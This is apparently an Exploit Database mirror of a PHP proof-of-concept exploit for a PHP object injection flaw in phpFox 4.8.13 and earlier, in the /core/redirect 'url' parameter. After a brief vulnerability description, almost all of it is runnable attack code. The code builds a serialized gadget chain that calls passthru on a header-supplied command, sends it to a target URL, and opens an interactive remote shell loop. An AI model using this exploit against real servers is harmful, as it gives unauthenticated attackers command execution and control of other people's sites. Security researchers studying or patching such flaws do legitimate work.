phpFox < 4.8.13 - (redirect) PHP Object Injection Exploit

• Exploit Database
• 51 阅读

• 作者： Egidio Romano
  日期： 2024-02-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51799/

• <?php
  
  /*
  --------------------------------------------------------------
  phpFox <= 4.8.13 (redirect) PHP Object Injection Vulnerability
  --------------------------------------------------------------
  
  author..............: Egidio Romano aka EgiX
  mail................: n0b0d13s[at]gmail[dot]com
  software link.......: https://www.phpfox.com
  
  +-------------------------------------------------------------------------+
  | This proof of concept code was written for educational purpose only.|
  | Use it at your own risk. Author will be not responsible for any damage. |
  +-------------------------------------------------------------------------+
  
  [-] Vulnerability Description:
  
  User input passed through the "url" request parameter to the /core/redirect route is
  not properly sanitized before being used in a call to the unserialize() PHP function.
  This can be exploited by remote, unauthenticated attackers to inject arbitrary PHP
  objects into the application scope, allowing them to perform a variety of attacks,
  such as executing arbitrary PHP code.
  
  [-] Original Advisory:
  
  https://karmainsecurity.com/KIS-2023-12
  */
  
  set_time_limit(0);
  error_reporting(E_ERROR);
  
  if (!extension_loaded("curl")) die("[+] cURL extension required!\n");
  
  print "+------------------------------------------------------------------+\n";
  print "| phpFox <= 4.8.13 (redirect) PHP Object Injection Exploit by EgiX |\n";
  print "+------------------------------------------------------------------+\n";
  
  if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n");
  
  function encode($string)
  {
  $string = addslashes(gzcompress($string, 9));
  return urlencode(strtr(base64_encode($string), '+/=', '-_,'));
  }
  
  class Phpfox_Request
  {
  	private $_sName = "EgiX";
  	private $_sPluginRequestGet = "print '_____'; passthru(base64_decode(\$_SERVER['HTTP_CMD'])); print '_____'; die;"; 
  }
  
  class Core_Objectify
  {
  	private $__toString;
  	
  	function __construct($callback)
  	{
  		$this->__toString = $callback;
  	}
  }
  
  print "\n[+] Launching shell on {$argv[1]}\n";
  
  $popChain = serialize(new Core_Objectify([new Phpfox_Request, "get"]));
  $popChain = str_replace('Core_Objectify', 'Core\Objectify', $popChain);
  
  $ch = curl_init();
  
  curl_setopt($ch, CURLOPT_URL, "{$argv[1]}index.php/core/redirect");
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  curl_setopt($ch, CURLOPT_POSTFIELDS, "url=".encode($popChain));
  
  while(1)
  {
  print "\nphpFox-shell# ";
  if (($cmd = trim(fgets(STDIN))) == "exit") break;
  curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);
  preg_match("/_____(.*)_____/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n");
  }